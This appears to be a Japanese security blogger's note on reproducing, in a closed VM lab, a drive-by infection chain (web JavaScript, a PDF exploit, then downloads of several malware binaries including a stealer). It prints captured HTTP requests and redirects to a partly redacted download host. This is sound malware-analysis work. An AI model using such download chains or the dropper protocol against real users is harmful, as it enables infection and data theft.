キャプチャーデータを元に、VMで構築したクローズな実験環境で２次感染するまでを再現。次のセミナーネタに使わせてもらおう。

WebサイトのJSを踏んでPDFファイルを表示しようとして、PDFのJSでバグを踏み、２次感染サーバから４本ほどバイナリをダウンロードして実行。C&Cサーバの指令を待ちつつSecurityToolsをインストールされるという流行なパターン。

２次感染を指令するサーバのプロトコル、といってもとても単純なモノを再現できたので、好きなバイナリをエージェントに転送可能。

問い合わせ先ホスト名は省略してるけど、こんな感じで複数のWEBサーバにリクエスト投げてる所まで追えます。もちろん各バイナリも入手済み。

GET /x/exe.php?src=marcos&id=bomba&x=pdf3 HTTP/1.1
Content-Disposition: inline; filename=setup.exe

GET /l.php?id=impuqhzLqpLEoEh&os=5.1&src=v&requestID=YzOKcpxXGc HTTP/1.1
Location: http://xxxx.in/x/severa.exe

GET /l.php?id=impuqhzLqpLEoEh&os=5.1&src=v&requestID=IQstcbzfrW HTTP/1.1
Location: http://xxxx.in/x/dogma.exe

GET /l.php?id=impuqhzLqpLEoEh&os=5.1&src=v&requestID=pTMkfVYAsc HTTP/1.1
Location: http://xxxx.in/x/toolbar.exe

GET /l.php?id=impuqhzLqpLEoEh&os=5.1&src=v&requestID=nrpQDYvYbw HTTP/1.1
Location: http://xxxx.in/x/stealer.exe

GET /l.php?id=impuqhzLqpLEoEh&os=5.1&src=v&requestID=UUKHpSuscD HTTP/1.1
Content-Disposition: inline; filename=null.exe

GET /get.php?c=CUBYKOGW&d=〜

BOTの指令サーバまで再現できなかったのが心残りかな。さすがに手間がかかりすぎるので、バイナリの解析も含めて、素人はここらでやめておきます。